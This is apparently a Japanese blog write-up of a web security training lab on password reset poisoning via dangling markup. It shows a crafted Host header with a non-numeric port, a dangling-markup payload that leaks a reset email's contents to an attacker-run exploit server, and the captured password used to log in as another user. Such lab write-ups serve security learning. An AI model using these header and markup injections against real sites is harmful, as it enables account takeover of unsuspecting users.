Shikata Ga Nai

Private? There is no such things.

Password reset poisoning via dangling markupをやってみた

 Hello there, ('ω')ノ

 

ダングリングマークアップによるパスワードリセットポイズニング

このラボは、 パスワードリセットポイズニングに対して脆弱で。

 

まずは、ページにアクセスしてパスワードリセットを。

 

f:id:ThisIsOne:20210420171135p:plain

 

エクスプロイトサーバのメールクライアントを開くと。

メール内のリンクはログインページで。

URLには、パスワードリセットトークンも含まれていなくて。

 

f:id:ThisIsOne:20210420171423p:plain

 

メールの本文は、下記のとおりで。

 

f:id:ThisIsOne:20210420171516p:plain

 

リクエストをリピータへ。

 f:id:ThisIsOne:20210420171658p:plain

 

Hostヘッダを変更するとサーバエラーが。

 

f:id:ThisIsOne:20210420171816p:plain

 

ただし、Hostヘッダのポートに数値以外を追加すると正常に処理されて。

 

 Host: ac261fce1e5ac53a80ef174800de00a5.web-security-academy.net:localhost

 

f:id:ThisIsOne:20210420171845p:plain

 

メールクライアントを確認するとしっかりと届いていて。

パスワードも届いていて。

 

f:id:ThisIsOne:20210420171947p:plain

 

本文を確認するとエスケープされていない単一引用符で囲まれているので。

 

 <a href='https://ac261fce1e5ac53a80ef174800de00a5.web-security-academy.net:localhost/login'>

 

f:id:ThisIsOne:20210420171918p:plain

 

エクスプロイトサーバのURLをコピーして。

 

f:id:ThisIsOne:20210420172128p:plain

 

下記のようなペイロードを挿入して、ユーザも変更してSendすると。

 '<a href="//ac9f1f321e73c58380c81745015700b5.web-security-academy.net/?

 

f:id:ThisIsOne:20210420172416p:plain

 

ログを確認すると下記のパスワードが確認できて。

 8zBAUpuiHJ

 

f:id:ThisIsOne:20210420172609p:plain

 

当然ながらメールは届かず。

 

f:id:ThisIsOne:20210420173022p:plain

 

carlosでログインすると。

 

f:id:ThisIsOne:20210420172648p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210420172659p:plain

 

Best regards, (^^ゞ